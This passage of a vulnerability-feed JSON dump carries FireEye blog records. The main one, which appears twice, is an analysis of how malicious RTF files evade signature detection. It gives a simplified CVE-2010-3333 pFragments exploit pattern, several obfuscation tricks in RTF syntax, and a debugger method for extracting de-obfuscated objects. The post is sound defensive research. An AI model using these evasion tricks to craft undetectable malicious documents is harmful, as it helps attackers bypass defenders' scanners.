Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-27T12:30:00", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12650", "CVE-2019-19781", "CVE-2012-0158"], "modified": "2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:05", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab1.png)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab2.png)\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Fig1.png)\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab3.png)\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab4.png)\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab5.png)\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab6.png)\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab9.png)\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab10.png)\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab1.png)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab2.png)\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Fig1.png)\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab3.png)\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab4.png)\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab5.png)\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab6.png)\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab9.png)\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RFT%20malware%20Yang/Tab10.png)\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T08:35:01", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A 